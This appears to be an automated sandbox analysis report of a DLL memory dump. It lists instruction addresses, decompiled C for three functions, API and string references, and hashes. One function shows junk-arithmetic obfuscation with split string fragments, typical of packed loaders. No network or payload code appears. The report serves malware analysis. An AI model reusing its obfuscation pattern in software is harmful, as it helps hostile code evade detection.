0x6e1db655
0x6e1db658
0x6e1db658
0x6e1db65b
0x6e1db65e
0x6e1db65e
0x6e1db663
0x6e1db66c
0x6e1db66f
0x6e1db672
0x6e1db674
0x6e1db67d
0x6e1db67e
0x6e1db681
0x6e1db68b
0x6e1db68f
0x6e1db691
0x6e1db6a5
0x6e1db6a5
0x6e1db6a8
0x6e1db6b2
0x6e1db6b7
0x6e1db6ba
0x6e1db6bc
0x00000000
0x6e1db6be
0x6e1db6be
0x6e1db6c8
0x6e1db6ca
0x6e1db6cc
0x6e1db6da
0x6e1db6dc
0x6e1db6e0
0x6e1db6e0
0x6e1db6ce
0x6e1db6cf
0x6e1db6d4
0x6e1db6e4
0x6e1db6ea
0x00000000
0x6e1db6ec
0x6e1db693
0x6e1db693
0x6e1db699
0x6e1db69e
0x6e1db6a1
0x6e1db6a3
0x6e1db6ef
0x6e1db6f1
0x6e1db6f2
0x6e1db6f3
0x6e1db6f4
0x6e1db6f5
0x6e1db6f6
0x6e1db6fb
0x6e1db6fe
0x6e1db6ff
0x6e1db701
0x6e1db707
0x6e1db70e
0x6e1db711
0x6e1db714
0x6e1db717
0x6e1db718
0x6e1db719
0x6e1db71c
0x6e1db722
0x6e1db724
0x6e1db726
0x6e1db726
0x6e1db728
0x6e1db72a
0x00000000
0x00000000
0x6e1db72c
0x6e1db72e
0x6e1db730
0x6e1db732
0x6e1db73d
0x6e1db73f
0x6e1db741
0x00000000
0x00000000
0x6e1db741
0x6e1db732
0x00000000
0x6e1db72e
0x6e1db743
0x6e1db743
0x6e1db749
0x6e1db74b
0x6e1db751
0x6e1db753
0x6e1db775
0x6e1db775
0x6e1db777
0x6e1db779
0x6e1db785
0x6e1db785
0x6e1db77b
0x6e1db77b
0x6e1db77d
0x00000000
0x6e1db77f
0x6e1db77f
0x6e1db781
0x6e1db783
0x00000000
0x00000000
0x6e1db783
0x6e1db77d
0x6e1db78d
0x6e1db795
0x6e1db79b
0x6e1db79c
0x6e1db79e
0x6e1db7a6
0x6e1db7ac
0x6e1db7b2
0x6e1db7b8
0x6e1db7cc
0x6e1db7d1
0x6e1db7dc
0x6e1db7ec
0x6e1db7f2
0x6e1db7f4
0x6e1db7f7
0x6e1db81a
0x6e1db81a
0x6e1db81f
0x6e1db825
0x6e1db825
0x6e1db82b
0x6e1db831
0x6e1db837
0x6e1db83d
0x6e1db843
0x6e1db864
0x6e1db869
0x6e1db86e
0x6e1db872
0x6e1db878
0x6e1db87b
0x6e1db88e
0x6e1db88e
0x6e1db894
0x6e1db89a
0x6e1db89b
0x6e1db89c
0x6e1db8a1
0x6e1db8a4
0x6e1db8aa
0x6e1db8ac
0x6e1db90a
0x6e1db910
0x6e1db918
0x6e1db91d
0x6e1db923
0x6e1db924
0x00000000
0x00000000
0x00000000
0x6e1db87d
0x6e1db87d
0x6e1db880
0x6e1db882
0x6e1db8ae
0x6e1db8ae
0x6e1db8b4
0x6e1db8bc
0x6e1db8c1
0x00000000
0x6e1db884
0x6e1db884
0x6e1db887
0x00000000
0x6e1db889
0x6e1db889
0x6e1db88c
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1db88c
0x6e1db887
0x6e1db882
0x6e1db926
0x6e1db927
0x00000000
0x6e1db8c2
0x6e1db8d0
0x6e1db8d0
0x6e1db8d8
0x6e1db8de
0x6e1db8e4
0x6e1db8eb
0x6e1db8ee
0x6e1db8f0
0x6e1db900
0x6e1db905
0x00000000
0x6e1db7f9
0x6e1db7f9
0x6e1db7ff
0x6e1db800
0x6e1db801
0x6e1db802
0x6e1db80a
0x6e1db80a
0x6e1db92d
0x6e1db92d
0x6e1db935
0x6e1db93d
0x6e1db942
0x6e1db755
0x6e1db758
0x6e1db75a
0x6e1db76f
0x00000000
0x6e1db75c
0x6e1db75c
0x6e1db75f
0x6e1db760
0x6e1db761
0x6e1db762
0x6e1db767
0x6e1db75a
0x6e1db949
0x6e1db952
0x00000000
0x00000000
0x00000000
0x6e1db6a3
0x6e1db676
0x6e1db678
0x6e1db679
0x6e1db67c
0x6e1db67c
0x00000000
0x00000000
0x00000000
0x6e1db5e9
0x6e1db5bc
0x6e1db5be
0x6e1db5bf
0x6e1db5c1
0x6e1db5c1
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1db50d
0x6e1db50d
0x6e1db513
0x6e1db516
0x6e1db519
0x6e1db51f
0x6e1db522
0x6e1db525
0x6e1db528
0x6e1db528
0x00000000
0x6e1db4cc
0x6e1db49a
0x6e1db49a
0x6e1db49d
0x6e1db537
0x6e1db538
0x6e1db53d
0x00000000
0x6e1db53d
0x6e1db3bf
0x6e1db3bf
0x6e1db3c1
0x6e1db3c2
0x6e1db3c8
0x6e1db3c9
0x6e1db3cf
0x6e1db3d8
0x6e1db3df
0x6e1db3e1
0x6e1db3e3
0x6e1db401
0x6e1db406
0x6e1db409
0x6e1db40c
0x6e1db3e5
0x6e1db3e5
0x6e1db3e8
0x6e1db3e9
0x6e1db3ea
0x6e1db3eb
0x6e1db3ec
0x6e1db3f1
0x6e1db3f3
0x6e1db3f6
0x6e1db3f6
0x6e1db40e
0x6e1db410
0x00000000
0x00000000
0x6e1db419
0x6e1db41c
0x6e1db41f
0x6e1db421
0x6e1db423
0x00000000
0x6e1db425
0x6e1db425
0x6e1db428
0x00000000
0x6e1db428
0x00000000
0x6e1db423
0x6e1db4a5
0x6e1db53e
0x6e1db541
0x6e1db545
0x6e1db54e
0x6e1db551
0x6e1db555
0x6e1db555
0x6e1db557
0x6e1db55a
0x6e1db55c
0x6e1db55e
0x6e1db560
0x6e1db565
0x6e1db566
0x6e1db56a
0x6e1db56a
0x6e1db56e
0x6e1db571
0x6e1db571
0x6e1db575
0x00000000
0x6e1db57c
0x6e1db392
0x6e1db392
0x6e1db399
0x6e1db39a
0x6e1db39c
0x6e1db57d
0x6e1db582
0x6e1db58b
0x6e1db58b
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1db2f2
0x6e1db2f2
0x6e1db2f8
0x6e1db2fb
0x6e1db2fe
0x6e1db301
0x6e1db304
0x6e1db307
0x6e1db30a
0x6e1db30a
0x00000000
0x6e1db2bb
0x6e1db289
0x6e1db289
0x6e1db28c
0x6e1db319
0x6e1db31a
0x6e1db31f
0x00000000
0x6e1db31f
0x6e1db1c0
0x6e1db1c0
0x6e1db1c3
0x6e1db1cb
0x6e1db1ce
0x6e1db1d5
0x6e1db1d7
0x6e1db1d9
0x6e1db1f4
0x6e1db1f5
0x6e1db1f6
0x6e1db1f7
0x6e1db1fc
0x6e1db1ff
0x6e1db202
0x6e1db1db
0x6e1db1db
0x6e1db1de
0x6e1db1df
0x6e1db1e0
0x6e1db1e1
0x6e1db1e2
0x6e1db1e7
0x6e1db1e9
0x6e1db1ec
0x6e1db1ec
0x6e1db204
0x6e1db206
0x00000000
0x00000000
0x6e1db20f
0x6e1db212
0x6e1db215
0x6e1db217
0x6e1db219
0x00000000
0x6e1db21b
0x6e1db21b
0x6e1db21e
0x00000000
0x6e1db21e
0x00000000
0x6e1db219
0x6e1db294
0x6e1db320
0x6e1db323
0x6e1db327
0x6e1db330
0x6e1db333
0x6e1db337
0x6e1db337
0x6e1db339
0x6e1db33c
0x6e1db33e
0x6e1db340
0x6e1db342
0x6e1db347
0x6e1db348
0x6e1db34c
0x6e1db34c
0x6e1db350
0x6e1db353
0x6e1db353
0x6e1db357
0x00000000
0x6e1db35e
0x6e1db190
0x6e1db190
0x6e1db197
0x6e1db198
0x6e1db19a
0x6e1db35f
0x6e1db363
0x6e1db363
0x00000000

APIs

_strpbrk.LIBCMT ref: 6E1DB1CE
_free.LIBCMT ref: 6E1DB31A

Strings

*?, xrefs: 6E1DB1C3

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free_strpbrk
String ID: *?
API String ID: 3300345361-2564092906
Opcode ID: 5107beadac544f9ee1486183cdeda74c2370533d149f48e9050bcb70af386401
Instruction ID: 91a38ae3fecd40ad2443ace6ceb74d4e4c8353b090d022075a99623482095e5c
Opcode Fuzzy Hash: 5107beadac544f9ee1486183cdeda74c2370533d149f48e9050bcb70af386401
Instruction Fuzzy Hash: E2E15CB5E002199FCB14CFE9C8819EEBBF5FF48710B24856AD816E7344D734AA85DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E17E461, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6E17E461(void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _t44;
				intOrPtr _t46;
				void* _t48;
				signed int _t50;
				signed int _t52;
				char* _t53;
				void* _t54;
				signed int _t56;
				signed int _t60;
				void* _t62;
				intOrPtr _t64;
				signed int _t65;
				void* _t69;
				intOrPtr _t73;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				intOrPtr _t88;
				signed int _t92;
				intOrPtr _t98;
				intOrPtr _t99;
				char _t101;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t108;
				intOrPtr _t111;
				intOrPtr _t113;
				intOrPtr _t117;
				char* _t118;
				signed int _t119;
				intOrPtr _t120;
				char* _t121;
				intOrPtr _t122;
				signed int _t126;
				void* _t127;
				void* _t128;
				char* _t129;
				char* _t130;
				char* _t131;
				signed int _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				void* _t138;
				void* _t139;
				void* _t142;

				_t102 = __edx;
				_t82 = __ebx;
				E6E1A9DBF(0x6e1e9e43, __ebx, __edi, __esi, 8);
				_t44 =  *0x6e218999 & 0x000000ff;
				_t83 =  *0x6e2189f0; // 0xffff6ed8
				asm("cdq");
				 *0x6e21898c = 0;
				_t117 =  *0x6e218984 * 7 - _t83;
				 *0x6e218988 = _t117;
				_t133 = _t102;
				if(_t133 <= 0 && (_t133 < 0 || _t44 <= _t117)) {
					_t101 =  *0x6e218980; // 0xfffedd42
					 *0x6e218994 = _t101;
					_t83 = _t117 - _t101 + 0xc;
					 *0x6e2189f0 = _t83;
					_t81 = _t83 - _t117 - 0x46;
					_t135 = _t81;
					 *0x6e218980 = _t81;
				}
				 *0x6e2189a0 = E6E17D29E(_t83);
				_t46 = E6E17D3E7();
				_t129 = _t128 - 0x10;
				 *0x6e218980 = _t46;
				_t118 = _t129;
				 *((intOrPtr*)(_t127 - 0x14)) = _t129;
				 *((intOrPtr*)(_t118 + 8)) = 0;
				 *((intOrPtr*)(_t118 + 0xc)) = 0;
				 *_t118 = 3;
				 *((intOrPtr*)(_t118 + 8)) = E6E18BA61(_t82, "6282", 0, _t118, _t135);
				 *(_t127 - 4) = 0;
				_push("Run Maste");
				_t48 = E6E181FAF(_t82, _t102, 0, _t118);
				 *(_t127 - 4) =  *(_t127 - 4) | 0xffffffff;
				E6E17EA7D(_t48);
				_t50 =  *0x6e218995 & 0x000000ff;
				_t119 = 0;
				_t111 =  *0x6e2189f0; // 0xffff6ed8
				asm("cdq");
				_t87 = _t102;
				 *0x6e222b18 = 0;
				_t103 =  *0x6e218988; // 0x39d3e4fe
				 *(_t127 - 0x10) = _t50;
				 *((intOrPtr*)(_t127 - 0x14)) = _t87;
				do {
					if(_t103 != _t50) {
						L7:
						_t11 = _t119 + 0x6e218990; // 0x3e6d3c9e
						_t88 =  *0x6e218980; // 0xfffedd42
						_t52 =  *0x6e21899a & 0x000000ff;
						_t111 = _t111 + 0xb + _t88 - ( *_t11 & 0x000000ff) - _t103;
						_t139 =  *0x6e218980 - _t52; // 0xfffedd42
						if(_t139 != 0) {
							_t50 =  *(_t127 - 0x10);
							_t87 =  *((intOrPtr*)(_t127 - 0x14));
							goto L9;
						}
					} else {
						_t138 =  *0x6e21898c - _t87; // 0xffffdd25
						if(_t138 == 0) {
							goto L9;
						} else {
							goto L7;
						}
					}
					break;
					L9:
					_t119 = _t119 + 1;
				} while (_t119 < 0x21);
				_t130 = _t129 - 0x10;
				 *0x6e222b18 = _t119;
				_t53 = _t130;
				 *0x6e2189f0 = _t111;
				 *((intOrPtr*)(_t127 - 0x14)) = _t130;
				 *(_t53 + 0xc) =  *(_t53 + 0xc) & 0x00000000;
				 *_t53 = 5;
				 *((intOrPtr*)(_t53 + 8)) = 0xe7c;
				 *(_t127 - 4) = 1;
				_push("dark Ru");
				_t54 = E6E181FAF(_t82, _t103, _t111, _t119);
				 *(_t127 - 4) =  *(_t127 - 4) | 0xffffffff;
				E6E17EA7D(_t54);
				_t56 =  *0x6e21898c; // 0xffffdd25
				_t104 =  *0x6e218988; // 0x39d3e4fe
				_t120 =  *0x6e2189a0; // 0xe402a6c3
				_t92 = 0x2b;
				do {
					_t113 = _t104;
					 *(_t127 - 0x10) = _t56;
					_t142 = _t113 -  *0x6e2189b0; // 0x87008705
					if(_t142 != 0 || _t56 != 0) {
						_t120 = _t120 + _t113 -  *0x6e218984 + 0xb;
						_t60 =  *0x6e218984; // 0xef1e5760
						 *((intOrPtr*)(0x6e2189b0 + _t92 * 4)) =  *((intOrPtr*)(0x6e2189b0 + _t92 * 4)) - _t60;
						_t56 = 0;
						asm("sbb eax, eax");
						_t104 = _t120 -  *0x6e218984 - _t113;
						 *0x6e218988 = _t104;
						asm("sbb eax, [ebp-0x10]");
						 *0x6e21898c = 0;
					}
					_t92 = _t92 - 2;
					_t145 = _t92 - 2;
				} while (_t92 > 2);
				_t131 = _t130 - 0x10;
				 *0x6e2189a0 = _t120;
				_t121 = _t131;
				 *0x6e222b18 = _t92;
				 *((intOrPtr*)(_t127 - 0x14)) = _t131;
				 *((intOrPtr*)(_t121 + 8)) = 0;
				 *((intOrPtr*)(_t121 + 0xc)) = 0;
				 *_t121 = 3;
				 *((intOrPtr*)(_t121 + 8)) = E6E18BA61(_t82, "4577", 0, _t121, _t145);
				 *(_t127 - 4) = 2;
				_push("were T");
				_t62 = E6E181FAF(_t82, _t104, 0, _t121);
				 *(_t127 - 4) =  *(_t127 - 4) | 0xffffffff;
				E6E17EA7D(_t62);
				_t122 =  *0x6e218988; // 0x39d3e4fe
				_t64 = E6E17D29E( *0x6e2189a4 & 0x000000ff);
				_t132 = _t131 - 0x10;
				 *0x6e218988 = _t64;
				_t65 =  *0x6e218984; // 0xef1e5760
				 *0x6e21898c = 0;
				 *(_t127 - 0x10) = _t132;
				_t126 = _t132;
				 *0x6e218984 = _t65 + 0x2f + _t122 -  *0x6e2189f0 -  *0x6e2189f0 + _t64;
				 *((intOrPtr*)(_t126 + 8)) = 0;
				 *((intOrPtr*)(_t126 + 0xc)) = 0;
				 *_t126 = 3;
				 *((intOrPtr*)(_t126 + 8)) = E6E18BA61(_t82, "3949", 0, _t126, _t145);
				 *(_t127 - 4) = 3;
				_push("snow or");
				_t69 = E6E181FAF(_t82, _t104, 0, _t126);
				 *(_t127 - 4) =  *(_t127 - 4) | 0xffffffff;
				E6E17EA7D(_t69);
				_t98 =  *0x6e2189f0; // 0xffff6ed8
				 *0x6e21898c = 0;
				_t108 =  *0x6e218984 * 7 - _t98;
				 *0x6e218988 = _t108;
				if( *0x6e21899c == 0) {
					_t99 =  *0x6e218980; // 0xfffedd42
					_t98 = _t99 - _t108 + 0xc;
					__eflags = _t98;
					 *0x6e2189f0 = _t98;
				} else {
					_t73 =  *0x6e218980; // 0xfffedd42
					 *0x6e218980 = _t108 + (_t73 + 0xcda) * 2 + _t98;
				}
				return E6E1A9D88(_t98);
			}

0x6e17e461
0x6e17e461
0x6e17e468
0x6e17e476
0x6e17e47d
0x6e17e483
0x6e17e484
0x6e17e48a
0x6e17e48c
0x6e17e492
0x6e17e494
0x6e17e49c
0x6e17e4a6
0x6e17e4ac
0x6e17e4b1
0x6e17e4b9
0x6e17e4b9
0x6e17e4bc
0x6e17e4bc
0x6e17e4c8
0x6e17e4cd
0x6e17e4d2
0x6e17e4d5
0x6e17e4da
0x6e17e4dc
0x6e17e4e4
0x6e17e4e7
0x6e17e4ea
0x6e17e4f2
0x6e17e4f5
0x6e17e4f8
0x6e17e4fd
0x6e17e502
0x6e17e508
0x6e17e50d
0x6e17e514
0x6e17e516
0x6e17e51c
0x6e17e51d
0x6e17e51f
0x6e17e525
0x6e17e52b
0x6e17e52e
0x6e17e531
0x6e17e533
0x6e17e53d
0x6e17e53d
0x6e17e547
0x6e17e54f
0x6e17e558
0x6e17e55a
0x6e17e560
0x6e17e562
0x6e17e565
0x00000000
0x6e17e565
0x6e17e535
0x6e17e535
0x6e17e53b
0x00000000
0x00000000
0x00000000
0x00000000
0x6e17e53b
0x00000000
0x6e17e568
0x6e17e568
0x6e17e569
0x6e17e56e
0x6e17e571
0x6e17e577
0x6e17e579
0x6e17e57f
0x6e17e582
0x6e17e586
0x6e17e589
0x6e17e590
0x6e17e597
0x6e17e59c
0x6e17e5a1
0x6e17e5a7
0x6e17e5ac
0x6e17e5b1
0x6e17e5b7
0x6e17e5bf
0x6e17e5c0
0x6e17e5c0
0x6e17e5c2
0x6e17e5c5
0x6e17e5cb
0x6e17e5dc
0x6e17e5de
0x6e17e5e3
0x6e17e5ec
0x6e17e5f4
0x6e17e5f6
0x6e17e5f8
0x6e17e5fe
0x6e17e601
0x6e17e601
0x6e17e606
0x6e17e609
0x6e17e609
0x6e17e60e
0x6e17e611
0x6e17e617
0x6e17e619
0x6e17e621
0x6e17e629
0x6e17e62c
0x6e17e62f
0x6e17e637
0x6e17e63a
0x6e17e641
0x6e17e646
0x6e17e64b
0x6e17e651
0x6e17e656
0x6e17e669
0x6e17e674
0x6e17e679
0x6e17e67e
0x6e17e68b
0x6e17e693
0x6e17e696
0x6e17e698
0x6e17e69d
0x6e17e6a0
0x6e17e6a3
0x6e17e6ab
0x6e17e6ae
0x6e17e6b5
0x6e17e6ba
0x6e17e6bf
0x6e17e6c5
0x6e17e6d1
0x6e17e6d7
0x6e17e6dd
0x6e17e6e6
0x6e17e6ec
0x6e17e704
0x6e17e70c
0x6e17e70c
0x6e17e70f
0x6e17e6ee
0x6e17e6ee
0x6e17e6fd
0x6e17e6fd
0x6e17e71c

APIs

__EH_prolog3.LIBCMT ref: 6E17E468

Strings

6282, xrefs: 6E17E4DF
4577, xrefs: 6E17E624
snow or, xrefs: 6E17E6B5
dark Ru, xrefs: 6E17E597
Run Maste, xrefs: 6E17E4F8
3949, xrefs: 6E17E683
were T, xrefs: 6E17E641

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: 3949$4577$6282$Run Maste$dark Ru$snow or$were T
API String ID: 431132790-1179637194
Opcode ID: 9badc2e75456bd96bdb66efff777deadd124d2270f6478600829a8dbad8f551b
Instruction ID: 16046111f4cbc869f61ed7dd04a047a964601886bf381519dffeb38114dbabab
Opcode Fuzzy Hash: 9badc2e75456bd96bdb66efff777deadd124d2270f6478600829a8dbad8f551b
Instruction Fuzzy Hash: 0471C1B1A01A068FCF18CFBCC59A5D9BBE6BB87704B14462DD1559BB50DB304B80DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DDD7B, Relevance: 13.7, APIs: 9, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E6E1DDD7B(void* __edx, void* __fp0, char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t59;
				signed int _t68;
				char _t81;
				intOrPtr* _t82;
				void* _t93;
				signed int _t96;
				char _t107;
				char _t108;
				void* _t113;
				char* _t114;
				signed int _t120;
				signed int* _t121;
				char _t123;
				intOrPtr* _t125;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				char* _t130;
				void* _t142;

				_t142 = __fp0;
				_t113 = __edx;
				_t123 = _a4;
				_v24 = _t123;
				_v20 = 0;
				if( *((intOrPtr*)(_t123 + 0xb0)) != 0 ||  *((intOrPtr*)(_t123 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E6E1D16BE(1, 0x50);
					if(_t93 != 0) {
						_t96 = 0x14;
						memcpy(_t93,  *(_t123 + 0x88), _t96 << 2);
						_t125 = E6E1D1C1E(4);
						_t120 = 0;
						_v8 = _t125;
						E6E1D1BE4(0);
						if(_t125 != 0) {
							 *_t125 = 0;
							_t123 = _a4;
							if( *((intOrPtr*)(_t123 + 0xb0)) == 0) {
								_t52 =  *0x6e218070; // 0x6e2180c4
								 *_t93 = _t52;
								_t53 =  *0x6e218074; // 0x6e221bb8
								 *((intOrPtr*)(_t93 + 4)) = _t53;
								_t54 =  *0x6e218078; // 0x6e221bb8
								 *((intOrPtr*)(_t93 + 8)) = _t54;
								_t55 =  *0x6e2180a0; // 0x6e2180c8
								 *((intOrPtr*)(_t93 + 0x30)) = _t55;
								_t56 =  *0x6e2180a4; // 0x6e221bbc
								 *((intOrPtr*)(_t93 + 0x34)) = _t56;
								L19:
								 *_v8 = 1;
								if(_t120 != 0) {
									 *_t120 = 1;
								}
								goto L21;
							}
							_t121 = E6E1D1C1E(4);
							_v12 = _t121;
							E6E1D1BE4(0);
							_push(_t93);
							if(_t121 != 0) {
								 *_t121 =  *_t121 & 0x00000000;
								_t122 =  *((intOrPtr*)(_t123 + 0xb0));
								_t68 = E6E1D3A02(_t93, _t113,  *((intOrPtr*)(_t123 + 0xb0)), _t123, _t142);
								_t16 = _t93 + 4; // 0x4
								_t126 = _t68;
								_t127 = _t126 | E6E1D3A02(_t93, _t113,  *((intOrPtr*)(_t123 + 0xb0)), _t126, _t142,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0xf, _t16,  &_v24);
								_t18 = _t93 + 8; // 0x8
								_t128 = _t127 | E6E1D3A02(_t93, _t113, _t122, _t127, _t142,  &_v24, 1, _t122, 0x10, _t18, 1);
								_t129 = _t128 | E6E1D3A02(_t93, _t113, _t122, _t128, _t142,  &_v24, 2, _t122, 0xe, _t93 + 0x30, _t122);
								_t22 = _t93 + 0x34; // 0x34
								if((E6E1D3A02(_t93, _t113, _t122, _t129, _t142,  &_v24, 2, _t122, 0xf, _t22, 0xe) | _t129) == 0) {
									_t114 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t81 =  *_t114;
										if(_t81 == 0) {
											break;
										}
										_t30 = _t81 - 0x30; // -48
										_t107 = _t30;
										if(_t107 > 9) {
											if(_t81 != 0x3b) {
												L16:
												_t114 = _t114 + 1;
												continue;
											}
											_t130 = _t114;
											do {
												_t82 = _t130 + 1;
												_t108 =  *_t82;
												 *_t130 = _t108;
												_t130 = _t82;
											} while (_t108 != 0);
											continue;
										}
										 *_t114 = _t107;
										goto L16;
									}
									_t120 = _v12;
									_t123 = _a4;
									goto L19;
								}
								E6E1DDD12(_t93);
								E6E1D1BE4(_t93);
								E6E1D1BE4(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E6E1D1BE4(_v8);
								return _v16;
							}
							E6E1D1BE4();
							goto L12;
						}
						E6E1D1BE4(_t93);
						return 1;
					}
					return 1;
				} else {
					_t120 = 0;
					_v8 = 0;
					_t93 = 0x6e218070;
					L21:
					_t59 =  *(_t123 + 0x80);
					if(_t59 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t123 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t59 | 0xffffffff) == 0) {
							E6E1D1BE4( *((intOrPtr*)(_t123 + 0x7c)));
							E6E1D1BE4( *(_t123 + 0x88));
						}
					}
					 *((intOrPtr*)(_t123 + 0x7c)) = _v8;
					 *(_t123 + 0x80) = _t120;
					 *(_t123 + 0x88) = _t93;
					return 0;
				}
			}

0x6e1ddd7b
0x6e1ddd7b
0x6e1ddd85
0x6e1ddd8b
0x6e1ddd8e
0x6e1ddd97
0x6e1dddb6
0x6e1dddbe
0x6e1dddc4
0x6e1dddd7
0x6e1dddd8
0x6e1ddde1
0x6e1ddde3
0x6e1ddde6
0x6e1ddde9
0x6e1dddf2
0x6e1dde03
0x6e1dde05
0x6e1dde0e
0x6e1ddf5e
0x6e1ddf63
0x6e1ddf65
0x6e1ddf6a
0x6e1ddf6d
0x6e1ddf72
0x6e1ddf75
0x6e1ddf7a
0x6e1ddf7d
0x6e1ddf82
0x6e1ddef0
0x6e1ddef6
0x6e1ddefa
0x6e1ddefc
0x6e1ddefc
0x00000000
0x6e1ddefa
0x6e1dde1b
0x6e1dde1f
0x6e1dde22
0x6e1dde29
0x6e1dde2c
0x6e1dde39
0x6e1dde3f
0x6e1dde4b
0x6e1dde50
0x6e1dde53
0x6e1dde64
0x6e1dde66
0x6e1dde78
0x6e1dde8f
0x6e1dde91
0x6e1ddea8
0x6e1dded4
0x6e1ddee4
0x6e1ddee4
0x6e1ddee8
0x00000000
0x00000000
0x6e1dded9
0x6e1dded9
0x6e1ddedf
0x6e1ddf4b
0x6e1ddee3
0x6e1ddee3
0x00000000
0x6e1ddee3
0x6e1ddf4d
0x6e1ddf4f
0x6e1ddf4f
0x6e1ddf52
0x6e1ddf54
0x6e1ddf56
0x6e1ddf58
0x00000000
0x6e1ddf5c
0x6e1ddee1
0x00000000
0x6e1ddee1
0x6e1ddeea
0x6e1ddeed
0x00000000
0x6e1ddeed
0x6e1ddeab
0x6e1ddeb1
0x6e1ddeb9
0x6e1ddec1
0x6e1ddec5
0x6e1ddec9
0x00000000
0x6e1dded1
0x6e1dde2e
0x00000000
0x6e1dde33
0x6e1dddf5
0x00000000
0x6e1dddfd
0x00000000
0x6e1ddda1
0x6e1ddda1
0x6e1ddda3
0x6e1ddda6
0x6e1ddefe
0x6e1ddefe
0x6e1ddf06
0x6e1ddf08
0x6e1ddf08
0x6e1ddf10
0x6e1ddf15
0x6e1ddf19
0x6e1ddf1e
0x6e1ddf29
0x6e1ddf2f
0x6e1ddf19
0x6e1ddf33
0x6e1ddf38
0x6e1ddf3e
0x00000000
0x6e1ddf3e

APIs

_free.LIBCMT ref: 6E1DDDE9
_free.LIBCMT ref: 6E1DDDF5
_free.LIBCMT ref: 6E1DDF1E
_free.LIBCMT ref: 6E1DDF29

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f2952661f3c21ef8a2177efe7121e08e4f6eaf7b3bf185aa0433b2df9ccb707c
Instruction ID: fe0f6605fb5f6acf6e260ec2482e98b4dd8687fc4c7f89540c7ae7bed0aaafee
Opcode Fuzzy Hash: f2952661f3c21ef8a2177efe7121e08e4f6eaf7b3bf185aa0433b2df9ccb707c
Instruction Fuzzy Hash: 3361F172A047059FDB10CFE8C880BDAB7FCAF55314F21065AE555EB281EB70A989EF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D0E20, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285COMMON

Download Yara Rule

APIs

Part of subcall function 6E1CF749: GetLastError.KERNEL32(00000008,?,00000000,6E1D8773,6E1913C8,6E191439,?,6E191225,00000000,00000000), ref: 6E1CF74E
Part of subcall function 6E1CF749: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6E191225,00000000,00000000), ref: 6E1CF7EC

_free.LIBCMT ref: 6E1D112D
_free.LIBCMT ref: 6E1D1146
_free.LIBCMT ref: 6E1D1184
_free.LIBCMT ref: 6E1D118D
_free.LIBCMT ref: 6E1D1199

Strings

C, xrefs: 6E1D0F7C

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
